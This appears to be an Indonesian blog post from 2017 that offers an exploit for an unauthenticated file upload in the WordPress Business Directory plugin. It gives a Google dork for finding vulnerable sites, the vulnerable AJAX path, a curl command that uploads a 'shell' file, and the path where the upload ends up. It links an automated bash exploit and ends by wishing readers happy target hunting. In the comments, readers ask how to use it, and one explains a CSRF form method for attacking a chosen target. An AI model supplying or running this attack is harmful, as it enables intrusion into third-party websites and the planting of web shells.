WordPress Business Directory Plugin File Upload

Saturday, 3 June 2017

WordPress Business Directory Plugin File Upload

Exploit Title: WordPress Business Directory Plugin File Upload
Author: Jingklong ( Bahari Trouble Maker )

Google Dork: inurl:/wp-content/ inurl:/business-directory-plugin
Vuln Path: /wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

Example Target:
http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

( Vuln Target )

Exploit:

1. CSRF

2. CURL POST

root # curl -v -k -F "file=@shell.gif" "http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"

Uplod file anda dengan format .gif/.jpg/.png

Hasil upload anda bisa dicari di:
http://target.com//wp-content/uploads/2017/06/shell.gif

Download:
Auto Exploit (BASH): https://pastebin.com/Wk904pU9

Oke, selamat mencari target :D

8 comments:

Arman Empirez said...: bang agus,ini harus pakek linux ya? kalo gk pakek gimana bang?; 6/04/2017 7:52 am
Anonymous said...: gapake linux juga bisa, pake csrf nya; 6/04/2017 3:36 pm
Anwar Bigfat said...: .php gabisa ya om?; 6/05/2017 8:31 pm
Anonymous said...: gabisa gan, cuma .gif aja; 6/06/2017 1:14 am
Rezta said...: Bang csrf dari mana ,sorry neubi; 6/06/2017 5:01 am
Anonymous said...: itu ada ss scriptnya gan, tulis ulang aja :v; 6/06/2017 10:41 pm
Anonymous said...: simpen dengan extensi/format .html
taro aja di local disknya, abis itu buka filenya

ganti bagian target="http://targetlu.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload" isi target lu; 6/06/2017 10:42 pm
ALVI ADNAN said...: bang ajarin tolongin ane cara biar root terminal devie kayagitu; 8/03/2017 11:44 pm

Saturday, 3 June 2017

WordPress Business Directory Plugin File Upload

8 comments:

Post a Comment

Blog Archive

Popular Posts